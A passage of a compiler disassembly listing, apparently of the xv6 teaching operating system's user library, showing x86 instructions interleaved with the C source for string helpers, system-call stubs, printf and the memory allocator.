414: 8b 45 08 mov 0x8(%ebp),%eax
417: 8b 5d 0c mov 0xc(%ebp),%ebx
for(; *s; s++)
41a: 0f b6 10 movzbl (%eax),%edx
41d: 84 d2 test %dl,%dl
41f: 74 1d je 43e <strchr+0x2e>
if(*s == c)
421: 38 d3 cmp %dl,%bl
423: 89 d9 mov %ebx,%ecx
425: 75 0d jne 434 <strchr+0x24>
427: eb 17 jmp 440 <strchr+0x30>
429: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
430: 38 ca cmp %cl,%dl
432: 74 0c je 440 <strchr+0x30>
}
char*
strchr(const char *s, char c)
{
for(; *s; s++)
434: 83 c0 01 add $0x1,%eax
437: 0f b6 10 movzbl (%eax),%edx
43a: 84 d2 test %dl,%dl
43c: 75 f2 jne 430 <strchr+0x20>
if(*s == c)
return (char*)s;
return 0;
43e: 31 c0 xor %eax,%eax
}
440: 5b pop %ebx
441: 5d pop %ebp
442: c3 ret
443: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
449: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000450 <gets>:
char*
gets(char *buf, int max)
{
450: 55 push %ebp
451: 89 e5 mov %esp,%ebp
453: 57 push %edi
454: 56 push %esi
455: 53 push %ebx
int i, cc;
char c;
for(i=0; i+1 < max; ){
456: 31 f6 xor %esi,%esi
cc = read(0, &c, 1);
458: 8d 7d e7 lea -0x19(%ebp),%edi
return 0;
}
char*
gets(char *buf, int max)
{
45b: 83 ec 1c sub $0x1c,%esp
int i, cc;
char c;
for(i=0; i+1 < max; ){
45e: eb 29 jmp 489 <gets+0x39>
cc = read(0, &c, 1);
460: 83 ec 04 sub $0x4,%esp
463: 6a 01 push $0x1
465: 57 push %edi
466: 6a 00 push $0x0
468: e8 2d 01 00 00 call 59a <read>
if(cc < 1)
46d: 83 c4 10 add $0x10,%esp
470: 85 c0 test %eax,%eax
472: 7e 1d jle 491 <gets+0x41>
break;
buf[i++] = c;
474: 0f b6 45 e7 movzbl -0x19(%ebp),%eax
478: 8b 55 08 mov 0x8(%ebp),%edx
47b: 89 de mov %ebx,%esi
if(c == '\n' || c == '\r')
47d: 3c 0a cmp $0xa,%al
for(i=0; i+1 < max; ){
cc = read(0, &c, 1);
if(cc < 1)
break;
buf[i++] = c;
47f: 88 44 1a ff mov %al,-0x1(%edx,%ebx,1)
if(c == '\n' || c == '\r')
483: 74 1b je 4a0 <gets+0x50>
485: 3c 0d cmp $0xd,%al
487: 74 17 je 4a0 <gets+0x50>
gets(char *buf, int max)
{
int i, cc;
char c;
for(i=0; i+1 < max; ){
489: 8d 5e 01 lea 0x1(%esi),%ebx
48c: 3b 5d 0c cmp 0xc(%ebp),%ebx
48f: 7c cf jl 460 <gets+0x10>
break;
buf[i++] = c;
if(c == '\n' || c == '\r')
break;
}
buf[i] = '\0';
491: 8b 45 08 mov 0x8(%ebp),%eax
494: c6 04 30 00 movb $0x0,(%eax,%esi,1)
return buf;
}
498: 8d 65 f4 lea -0xc(%ebp),%esp
49b: 5b pop %ebx
49c: 5e pop %esi
49d: 5f pop %edi
49e: 5d pop %ebp
49f: c3 ret
break;
buf[i++] = c;
if(c == '\n' || c == '\r')
break;
}
buf[i] = '\0';
4a0: 8b 45 08 mov 0x8(%ebp),%eax
gets(char *buf, int max)
{
int i, cc;
char c;
for(i=0; i+1 < max; ){
4a3: 89 de mov %ebx,%esi
break;
buf[i++] = c;
if(c == '\n' || c == '\r')
break;
}
buf[i] = '\0';
4a5: c6 04 30 00 movb $0x0,(%eax,%esi,1)
return buf;
}
4a9: 8d 65 f4 lea -0xc(%ebp),%esp
4ac: 5b pop %ebx
4ad: 5e pop %esi
4ae: 5f pop %edi
4af: 5d pop %ebp
4b0: c3 ret
4b1: eb 0d jmp 4c0 <stat>
4b3: 90 nop
4b4: 90 nop
4b5: 90 nop
4b6: 90 nop
4b7: 90 nop
4b8: 90 nop
4b9: 90 nop
4ba: 90 nop
4bb: 90 nop
4bc: 90 nop
4bd: 90 nop
4be: 90 nop
4bf: 90 nop
000004c0 <stat>:
int
stat(char *n, struct stat *st)
{
4c0: 55 push %ebp
4c1: 89 e5 mov %esp,%ebp
4c3: 56 push %esi
4c4: 53 push %ebx
int fd;
int r;
fd = open(n, O_RDONLY);
4c5: 83 ec 08 sub $0x8,%esp
4c8: 6a 00 push $0x0
4ca: ff 75 08 pushl 0x8(%ebp)
4cd: e8 f0 00 00 00 call 5c2 <open>
if(fd < 0)
4d2: 83 c4 10 add $0x10,%esp
4d5: 85 c0 test %eax,%eax
4d7: 78 27 js 500 <stat+0x40>
return -1;
r = fstat(fd, st);
4d9: 83 ec 08 sub $0x8,%esp
4dc: ff 75 0c pushl 0xc(%ebp)
4df: 89 c3 mov %eax,%ebx
4e1: 50 push %eax
4e2: e8 f3 00 00 00 call 5da <fstat>
4e7: 89 c6 mov %eax,%esi
close(fd);
4e9: 89 1c 24 mov %ebx,(%esp)
4ec: e8 b9 00 00 00 call 5aa <close>
return r;
4f1: 83 c4 10 add $0x10,%esp
4f4: 89 f0 mov %esi,%eax
}
4f6: 8d 65 f8 lea -0x8(%ebp),%esp
4f9: 5b pop %ebx
4fa: 5e pop %esi
4fb: 5d pop %ebp
4fc: c3 ret
4fd: 8d 76 00 lea 0x0(%esi),%esi
int fd;
int r;
fd = open(n, O_RDONLY);
if(fd < 0)
return -1;
500: b8 ff ff ff ff mov $0xffffffff,%eax
505: eb ef jmp 4f6 <stat+0x36>
507: 89 f6 mov %esi,%esi
509: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000510 <atoi>:
return r;
}
int
atoi(const char *s)
{
510: 55 push %ebp
511: 89 e5 mov %esp,%ebp
513: 53 push %ebx
514: 8b 4d 08 mov 0x8(%ebp),%ecx
int n;
n = 0;
while('0' <= *s && *s <= '9')
517: 0f be 11 movsbl (%ecx),%edx
51a: 8d 42 d0 lea -0x30(%edx),%eax
51d: 3c 09 cmp $0x9,%al
51f: b8 00 00 00 00 mov $0x0,%eax
524: 77 1f ja 545 <atoi+0x35>
526: 8d 76 00 lea 0x0(%esi),%esi
529: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
n = n*10 + *s++ - '0';
530: 8d 04 80 lea (%eax,%eax,4),%eax
533: 83 c1 01 add $0x1,%ecx
536: 8d 44 42 d0 lea -0x30(%edx,%eax,2),%eax
atoi(const char *s)
{
int n;
n = 0;
while('0' <= *s && *s <= '9')
53a: 0f be 11 movsbl (%ecx),%edx
53d: 8d 5a d0 lea -0x30(%edx),%ebx
540: 80 fb 09 cmp $0x9,%bl
543: 76 eb jbe 530 <atoi+0x20>
n = n*10 + *s++ - '0';
return n;
}
545: 5b pop %ebx
546: 5d pop %ebp
547: c3 ret
548: 90 nop
549: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
00000550 <memmove>:
void*
memmove(void *vdst, void *vsrc, int n)
{
550: 55 push %ebp
551: 89 e5 mov %esp,%ebp
553: 56 push %esi
554: 53 push %ebx
555: 8b 5d 10 mov 0x10(%ebp),%ebx
558: 8b 45 08 mov 0x8(%ebp),%eax
55b: 8b 75 0c mov 0xc(%ebp),%esi
char *dst, *src;
dst = vdst;
src = vsrc;
while(n-- > 0)
55e: 85 db test %ebx,%ebx
560: 7e 14 jle 576 <memmove+0x26>
562: 31 d2 xor %edx,%edx
564: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
*dst++ = *src++;
568: 0f b6 0c 16 movzbl (%esi,%edx,1),%ecx
56c: 88 0c 10 mov %cl,(%eax,%edx,1)
56f: 83 c2 01 add $0x1,%edx
{
char *dst, *src;
dst = vdst;
src = vsrc;
while(n-- > 0)
572: 39 da cmp %ebx,%edx
574: 75 f2 jne 568 <memmove+0x18>
*dst++ = *src++;
return vdst;
}
576: 5b pop %ebx
577: 5e pop %esi
578: 5d pop %ebp
579: c3 ret
0000057a <fork>:
name: \
movl $SYS_ ## name, %eax; \
int $T_SYSCALL; \
ret
SYSCALL(fork)
57a: b8 01 00 00 00 mov $0x1,%eax
57f: cd 40 int $0x40
581: c3 ret
00000582 <exit>:
SYSCALL(exit)
582: b8 02 00 00 00 mov $0x2,%eax
587: cd 40 int $0x40
589: c3 ret
0000058a <wait>:
SYSCALL(wait)
58a: b8 03 00 00 00 mov $0x3,%eax
58f: cd 40 int $0x40
591: c3 ret
00000592 <pipe>:
SYSCALL(pipe)
592: b8 04 00 00 00 mov $0x4,%eax
597: cd 40 int $0x40
599: c3 ret
0000059a <read>:
SYSCALL(read)
59a: b8 05 00 00 00 mov $0x5,%eax
59f: cd 40 int $0x40
5a1: c3 ret
000005a2 <write>:
SYSCALL(write)
5a2: b8 10 00 00 00 mov $0x10,%eax
5a7: cd 40 int $0x40
5a9: c3 ret
000005aa <close>:
SYSCALL(close)
5aa: b8 15 00 00 00 mov $0x15,%eax
5af: cd 40 int $0x40
5b1: c3 ret
000005b2 <kill>:
SYSCALL(kill)
5b2: b8 06 00 00 00 mov $0x6,%eax
5b7: cd 40 int $0x40
5b9: c3 ret
000005ba <exec>:
SYSCALL(exec)
5ba: b8 07 00 00 00 mov $0x7,%eax
5bf: cd 40 int $0x40
5c1: c3 ret
000005c2 <open>:
SYSCALL(open)
5c2: b8 0f 00 00 00 mov $0xf,%eax
5c7: cd 40 int $0x40
5c9: c3 ret
000005ca <mknod>:
SYSCALL(mknod)
5ca: b8 11 00 00 00 mov $0x11,%eax
5cf: cd 40 int $0x40
5d1: c3 ret
000005d2 <unlink>:
SYSCALL(unlink)
5d2: b8 12 00 00 00 mov $0x12,%eax
5d7: cd 40 int $0x40
5d9: c3 ret
000005da <fstat>:
SYSCALL(fstat)
5da: b8 08 00 00 00 mov $0x8,%eax
5df: cd 40 int $0x40
5e1: c3 ret
000005e2 <link>:
SYSCALL(link)
5e2: b8 13 00 00 00 mov $0x13,%eax
5e7: cd 40 int $0x40
5e9: c3 ret
000005ea <mkdir>:
SYSCALL(mkdir)
5ea: b8 14 00 00 00 mov $0x14,%eax
5ef: cd 40 int $0x40
5f1: c3 ret
000005f2 <chdir>:
SYSCALL(chdir)
5f2: b8 09 00 00 00 mov $0x9,%eax
5f7: cd 40 int $0x40
5f9: c3 ret
000005fa <dup>:
SYSCALL(dup)
5fa: b8 0a 00 00 00 mov $0xa,%eax
5ff: cd 40 int $0x40
601: c3 ret
00000602 <getpid>:
SYSCALL(getpid)
602: b8 0b 00 00 00 mov $0xb,%eax
607: cd 40 int $0x40
609: c3 ret
0000060a <sbrk>:
SYSCALL(sbrk)
60a: b8 0c 00 00 00 mov $0xc,%eax
60f: cd 40 int $0x40
611: c3 ret
00000612 <sleep>:
SYSCALL(sleep)
612: b8 0d 00 00 00 mov $0xd,%eax
617: cd 40 int $0x40
619: c3 ret
0000061a <uptime>:
SYSCALL(uptime)
61a: b8 0e 00 00 00 mov $0xe,%eax
61f: cd 40 int $0x40
621: c3 ret
622: 66 90 xchg %ax,%ax
624: 66 90 xchg %ax,%ax
626: 66 90 xchg %ax,%ax
628: 66 90 xchg %ax,%ax
62a: 66 90 xchg %ax,%ax
62c: 66 90 xchg %ax,%ax
62e: 66 90 xchg %ax,%ax
00000630 <printint>:
write(fd, &c, 1);
}
static void
printint(int fd, int xx, int base, int sgn)
{
630: 55 push %ebp
631: 89 e5 mov %esp,%ebp
633: 57 push %edi
634: 56 push %esi
635: 53 push %ebx
636: 89 c6 mov %eax,%esi
638: 83 ec 3c sub $0x3c,%esp
char buf[16];
int i, neg;
uint x;
neg = 0;
if(sgn && xx < 0){
63b: 8b 5d 08 mov 0x8(%ebp),%ebx
63e: 85 db test %ebx,%ebx
640: 74 7e je 6c0 <printint+0x90>
642: 89 d0 mov %edx,%eax
644: c1 e8 1f shr $0x1f,%eax
647: 84 c0 test %al,%al
649: 74 75 je 6c0 <printint+0x90>
neg = 1;
x = -xx;
64b: 89 d0 mov %edx,%eax
int i, neg;
uint x;
neg = 0;
if(sgn && xx < 0){
neg = 1;
64d: c7 45 c4 01 00 00 00 movl $0x1,-0x3c(%ebp)
x = -xx;
654: f7 d8 neg %eax
656: 89 75 c0 mov %esi,-0x40(%ebp)
} else {
x = xx;
}
i = 0;
659: 31 ff xor %edi,%edi
65b: 8d 5d d7 lea -0x29(%ebp),%ebx
65e: 89 ce mov %ecx,%esi
660: eb 08 jmp 66a <printint+0x3a>
662: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
do{
buf[i++] = digits[x % base];
668: 89 cf mov %ecx,%edi
66a: 31 d2 xor %edx,%edx
66c: 8d 4f 01 lea 0x1(%edi),%ecx
66f: f7 f6 div %esi
671: 0f b6 92 44 0a 00 00 movzbl 0xa44(%edx),%edx
}while((x /= base) != 0);
678: 85 c0 test %eax,%eax
x = xx;
}
i = 0;
do{
buf[i++] = digits[x % base];
67a: 88 14 0b mov %dl,(%ebx,%ecx,1)
}while((x /= base) != 0);
67d: 75 e9 jne 668 <printint+0x38>
if(neg)
67f: 8b 45 c4 mov -0x3c(%ebp),%eax
682: 8b 75 c0 mov -0x40(%ebp),%esi
685: 85 c0 test %eax,%eax
687: 74 08 je 691 <printint+0x61>
buf[i++] = '-';
689: c6 44 0d d8 2d movb $0x2d,-0x28(%ebp,%ecx,1)
68e: 8d 4f 02 lea 0x2(%edi),%ecx
691: 8d 7c 0d d7 lea -0x29(%ebp,%ecx,1),%edi
695: 8d 76 00 lea 0x0(%esi),%esi
698: 0f b6 07 movzbl (%edi),%eax
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
69b: 83 ec 04 sub $0x4,%esp
69e: 83 ef 01 sub $0x1,%edi
6a1: 6a 01 push $0x1
6a3: 53 push %ebx
6a4: 56 push %esi
6a5: 88 45 d7 mov %al,-0x29(%ebp)
6a8: e8 f5 fe ff ff call 5a2 <write>
buf[i++] = digits[x % base];
}while((x /= base) != 0);
if(neg)
buf[i++] = '-';
while(--i >= 0)
6ad: 83 c4 10 add $0x10,%esp
6b0: 39 df cmp %ebx,%edi
6b2: 75 e4 jne 698 <printint+0x68>
putc(fd, buf[i]);
}
6b4: 8d 65 f4 lea -0xc(%ebp),%esp
6b7: 5b pop %ebx
6b8: 5e pop %esi
6b9: 5f pop %edi
6ba: 5d pop %ebp
6bb: c3 ret
6bc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
neg = 0;
if(sgn && xx < 0){
neg = 1;
x = -xx;
} else {
x = xx;
6c0: 89 d0 mov %edx,%eax
static char digits[] = "0123456789ABCDEF";
char buf[16];
int i, neg;
uint x;
neg = 0;
6c2: c7 45 c4 00 00 00 00 movl $0x0,-0x3c(%ebp)
6c9: eb 8b jmp 656 <printint+0x26>
6cb: 90 nop
6cc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
000006d0 <printf>:
}
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, char *fmt, ...)
{
6d0: 55 push %ebp
6d1: 89 e5 mov %esp,%ebp
6d3: 57 push %edi
6d4: 56 push %esi
6d5: 53 push %ebx
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
6d6: 8d 45 10 lea 0x10(%ebp),%eax
}
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, char *fmt, ...)
{
6d9: 83 ec 2c sub $0x2c,%esp
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
6dc: 8b 75 0c mov 0xc(%ebp),%esi
}
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, char *fmt, ...)
{
6df: 8b 7d 08 mov 0x8(%ebp),%edi
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
6e2: 89 45 d0 mov %eax,-0x30(%ebp)
6e5: 0f b6 1e movzbl (%esi),%ebx
6e8: 83 c6 01 add $0x1,%esi
6eb: 84 db test %bl,%bl
6ed: 0f 84 b0 00 00 00 je 7a3 <printf+0xd3>
6f3: 31 d2 xor %edx,%edx
6f5: eb 39 jmp 730 <printf+0x60>
6f7: 89 f6 mov %esi,%esi
6f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
c = fmt[i] & 0xff;
if(state == 0){
if(c == '%'){
700: 83 f8 25 cmp $0x25,%eax
703: 89 55 d4 mov %edx,-0x2c(%ebp)
state = '%';
706: ba 25 00 00 00 mov $0x25,%edx
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
c = fmt[i] & 0xff;
if(state == 0){
if(c == '%'){
70b: 74 18 je 725 <printf+0x55>
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
70d: 8d 45 e2 lea -0x1e(%ebp),%eax
710: 83 ec 04 sub $0x4,%esp
713: 88 5d e2 mov %bl,-0x1e(%ebp)
716: 6a 01 push $0x1
718: 50 push %eax
719: 57 push %edi
71a: e8 83 fe ff ff call 5a2 <write>
71f: 8b 55 d4 mov -0x2c(%ebp),%edx
722: 83 c4 10 add $0x10,%esp
725: 83 c6 01 add $0x1,%esi
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
728: 0f b6 5e ff movzbl -0x1(%esi),%ebx
72c: 84 db test %bl,%bl
72e: 74 73 je 7a3 <printf+0xd3>
c = fmt[i] & 0xff;
if(state == 0){
730: 85 d2 test %edx,%edx
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
c = fmt[i] & 0xff;
732: 0f be cb movsbl %bl,%ecx
735: 0f b6 c3 movzbl %bl,%eax
if(state == 0){
738: 74 c6 je 700 <printf+0x30>
if(c == '%'){
state = '%';
} else {
putc(fd, c);
}
} else if(state == '%'){
73a: 83 fa 25 cmp $0x25,%edx
73d: 75 e6 jne 725 <printf+0x55>
if(c == 'd'){
73f: 83 f8 64 cmp $0x64,%eax
742: 0f 84 f8 00 00 00 je 840 <printf+0x170>
printint(fd, *ap, 10, 1);
ap++;
} else if(c == 'x' || c == 'p'){
748: 81 e1 f7 00 00 00 and $0xf7,%ecx
74e: 83 f9 70 cmp $0x70,%ecx
751: 74 5d je 7b0 <printf+0xe0>
printint(fd, *ap, 16, 0);
ap++;
} else if(c == 's'){
753: 83 f8 73 cmp $0x73,%eax
756: 0f 84 84 00 00 00 je 7e0 <printf+0x110>
s = "(null)";
while(*s != 0){
putc(fd, *s);
s++;
}
} else if(c == 'c'){
75c: 83 f8 63 cmp $0x63,%eax
75f: 0f 84 ea 00 00 00 je 84f <printf+0x17f>
putc(fd, *ap);
ap++;
} else if(c == '%'){
765: 83 f8 25 cmp $0x25,%eax
768: 0f 84 c2 00 00 00 je 830 <printf+0x160>
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
76e: 8d 45 e7 lea -0x19(%ebp),%eax
771: 83 ec 04 sub $0x4,%esp
774: c6 45 e7 25 movb $0x25,-0x19(%ebp)
778: 6a 01 push $0x1
77a: 50 push %eax
77b: 57 push %edi
77c: e8 21 fe ff ff call 5a2 <write>
781: 83 c4 0c add $0xc,%esp
784: 8d 45 e6 lea -0x1a(%ebp),%eax
787: 88 5d e6 mov %bl,-0x1a(%ebp)
78a: 6a 01 push $0x1
78c: 50 push %eax
78d: 57 push %edi
78e: 83 c6 01 add $0x1,%esi
791: e8 0c fe ff ff call 5a2 <write>
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
796: 0f b6 5e ff movzbl -0x1(%esi),%ebx
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
79a: 83 c4 10 add $0x10,%esp
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
putc(fd, c);
}
state = 0;
79d: 31 d2 xor %edx,%edx
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
79f: 84 db test %bl,%bl
7a1: 75 8d jne 730 <printf+0x60>
putc(fd, c);
}
state = 0;
}
}
}
7a3: 8d 65 f4 lea -0xc(%ebp),%esp
7a6: 5b pop %ebx
7a7: 5e pop %esi
7a8: 5f pop %edi
7a9: 5d pop %ebp
7aa: c3 ret
7ab: 90 nop
7ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
} else if(state == '%'){
if(c == 'd'){
printint(fd, *ap, 10, 1);
ap++;
} else if(c == 'x' || c == 'p'){
printint(fd, *ap, 16, 0);
7b0: 83 ec 0c sub $0xc,%esp
7b3: b9 10 00 00 00 mov $0x10,%ecx
7b8: 6a 00 push $0x0
7ba: 8b 5d d0 mov -0x30(%ebp),%ebx
7bd: 89 f8 mov %edi,%eax
7bf: 8b 13 mov (%ebx),%edx
7c1: e8 6a fe ff ff call 630 <printint>
ap++;
7c6: 89 d8 mov %ebx,%eax
7c8: 83 c4 10 add $0x10,%esp
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
putc(fd, c);
}
state = 0;
7cb: 31 d2 xor %edx,%edx
if(c == 'd'){
printint(fd, *ap, 10, 1);
ap++;
} else if(c == 'x' || c == 'p'){
printint(fd, *ap, 16, 0);
ap++;
7cd: 83 c0 04 add $0x4,%eax
7d0: 89 45 d0 mov %eax,-0x30(%ebp)
7d3: e9 4d ff ff ff jmp 725 <printf+0x55>
7d8: 90 nop
7d9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
} else if(c == 's'){
s = (char*)*ap;
7e0: 8b 45 d0 mov -0x30(%ebp),%eax
7e3: 8b 18 mov (%eax),%ebx
ap++;
7e5: 83 c0 04 add $0x4,%eax
7e8: 89 45 d0 mov %eax,-0x30(%ebp)
if(s == 0)
s = "(null)";
7eb: b8 3a 0a 00 00 mov $0xa3a,%eax
7f0: 85 db test %ebx,%ebx
7f2: 0f 44 d8 cmove %eax,%ebx
while(*s != 0){
7f5: 0f b6 03 movzbl (%ebx),%eax
7f8: 84 c0 test %al,%al
7fa: 74 23 je 81f <printf+0x14f>
7fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
800: 88 45 e3 mov %al,-0x1d(%ebp)
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
803: 8d 45 e3 lea -0x1d(%ebp),%eax
806: 83 ec 04 sub $0x4,%esp
809: 6a 01 push $0x1
ap++;
if(s == 0)
s = "(null)";
while(*s != 0){
putc(fd, *s);
s++;
80b: 83 c3 01 add $0x1,%ebx
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
80e: 50 push %eax
80f: 57 push %edi
810: e8 8d fd ff ff call 5a2 <write>
} else if(c == 's'){
s = (char*)*ap;
ap++;
if(s == 0)
s = "(null)";
while(*s != 0){
815: 0f b6 03 movzbl (%ebx),%eax
818: 83 c4 10 add $0x10,%esp
81b: 84 c0 test %al,%al
81d: 75 e1 jne 800 <printf+0x130>
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
putc(fd, c);
}
state = 0;
81f: 31 d2 xor %edx,%edx
821: e9 ff fe ff ff jmp 725 <printf+0x55>
826: 8d 76 00 lea 0x0(%esi),%esi
829: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
830: 83 ec 04 sub $0x4,%esp
833: 88 5d e5 mov %bl,-0x1b(%ebp)
836: 8d 45 e5 lea -0x1b(%ebp),%eax
839: 6a 01 push $0x1
83b: e9 4c ff ff ff jmp 78c <printf+0xbc>
} else {
putc(fd, c);
}
} else if(state == '%'){
if(c == 'd'){
printint(fd, *ap, 10, 1);
840: 83 ec 0c sub $0xc,%esp
843: b9 0a 00 00 00 mov $0xa,%ecx
848: 6a 01 push $0x1
84a: e9 6b ff ff ff jmp 7ba <printf+0xea>
84f: 8b 5d d0 mov -0x30(%ebp),%ebx
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
852: 83 ec 04 sub $0x4,%esp
855: 8b 03 mov (%ebx),%eax
857: 6a 01 push $0x1
859: 88 45 e4 mov %al,-0x1c(%ebp)
85c: 8d 45 e4 lea -0x1c(%ebp),%eax
85f: 50 push %eax
860: 57 push %edi
861: e8 3c fd ff ff call 5a2 <write>
866: e9 5b ff ff ff jmp 7c6 <printf+0xf6>
86b: 66 90 xchg %ax,%ax
86d: 66 90 xchg %ax,%ax
86f: 90 nop
00000870 <free>:
static Header base;
static Header *freep;
void
free(void *ap)
{
870: 55 push %ebp
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
871: a1 60 0d 00 00 mov 0xd60,%eax
static Header base;
static Header *freep;
void
free(void *ap)
{
876: 89 e5 mov %esp,%ebp
878: 57 push %edi
879: 56 push %esi
87a: 53 push %ebx
87b: 8b 5d 08 mov 0x8(%ebp),%ebx
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
87e: 8b 10 mov (%eax),%edx
void
free(void *ap)
{
Header *bp, *p;
bp = (Header*)ap - 1;
880: 8d 4b f8 lea -0x8(%ebx),%ecx
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
883: 39 c8 cmp %ecx,%eax
885: 73 19 jae 8a0 <free+0x30>
887: 89 f6 mov %esi,%esi
889: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
890: 39 d1 cmp %edx,%ecx
892: 72 1c jb 8b0 <free+0x40>
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
894: 39 d0 cmp %edx,%eax
896: 73 18 jae 8b0 <free+0x40>
static Header base;
static Header *freep;
void
free(void *ap)
{
898: 89 d0 mov %edx,%eax
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
89a: 39 c8 cmp %ecx,%eax
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
89c: 8b 10 mov (%eax),%edx
free(void *ap)
{
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
89e: 72 f0 jb 890 <free+0x20>
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
8a0: 39 d0 cmp %edx,%eax
8a2: 72 f4 jb 898 <free+0x28>
8a4: 39 d1 cmp %edx,%ecx
8a6: 73 f0 jae 898 <free+0x28>
8a8: 90 nop
8a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
break;
if(bp + bp->s.size == p->s.ptr){
8b0: 8b 73 fc mov -0x4(%ebx),%esi
8b3: 8d 3c f1 lea (%ecx,%esi,8),%edi
8b6: 39 d7 cmp %edx,%edi
8b8: 74 19 je 8d3 <free+0x63>
bp->s.size += p->s.ptr->s.size;
bp->s.ptr = p->s.ptr->s.ptr;
} else
bp->s.ptr = p->s.ptr;
8ba: 89 53 f8 mov %edx,-0x8(%ebx)
if(p + p->s.size == bp){
8bd: 8b 50 04 mov 0x4(%eax),%edx
8c0: 8d 34 d0 lea (%eax,%edx,8),%esi
8c3: 39 f1 cmp %esi,%ecx
8c5: 74 23 je 8ea <free+0x7a>
p->s.size += bp->s.size;
p->s.ptr = bp->s.ptr;
} else
p->s.ptr = bp;
8c7: 89 08 mov %ecx,(%eax)
freep = p;
8c9: a3 60 0d 00 00 mov %eax,0xd60
}
8ce: 5b pop %ebx
8cf: 5e pop %esi
8d0: 5f pop %edi
8d1: 5d pop %ebp
8d2: c3 ret
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
break;
if(bp + bp->s.size == p->s.ptr){
bp->s.size += p->s.ptr->s.size;
8d3: 03 72 04 add 0x4(%edx),%esi
8d6: 89 73 fc mov %esi,-0x4(%ebx)
bp->s.ptr = p->s.ptr->s.ptr;
8d9: 8b 10 mov (%eax),%edx
8db: 8b 12 mov (%edx),%edx
8dd: 89 53 f8 mov %edx,-0x8(%ebx)
} else
bp->s.ptr = p->s.ptr;
if(p + p->s.size == bp){
8e0: 8b 50 04 mov 0x4(%eax),%edx
8e3: 8d 34 d0 lea (%eax,%edx,8),%esi
8e6: 39 f1 cmp %esi,%ecx
8e8: 75 dd jne 8c7 <free+0x57>
p->s.size += bp->s.size;
8ea: 03 53 fc add -0x4(%ebx),%edx
p->s.ptr = bp->s.ptr;
} else
p->s.ptr = bp;
freep = p;
8ed: a3 60 0d 00 00 mov %eax,0xd60
bp->s.size += p->s.ptr->s.size;
bp->s.ptr = p->s.ptr->s.ptr;
} else
bp->s.ptr = p->s.ptr;
if(p + p->s.size == bp){
p->s.size += bp->s.size;
8f2: 89 50 04 mov %edx,0x4(%eax)
p->s.ptr = bp->s.ptr;
8f5: 8b 53 f8 mov -0x8(%ebx),%edx
8f8: 89 10 mov %edx,(%eax)
} else
p->s.ptr = bp;
freep = p;
}
8fa: 5b pop %ebx
8fb: 5e pop %esi
8fc: 5f pop %edi
8fd: 5d pop %ebp
8fe: c3 ret
8ff: 90 nop
00000900 <malloc>:
return freep;
}
void*
malloc(uint nbytes)
{
900: 55 push %ebp
901: 89 e5 mov %esp,%ebp
903: 57 push %edi
904: 56 push %esi
905: 53 push %ebx
906: 83 ec 0c sub $0xc,%esp
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
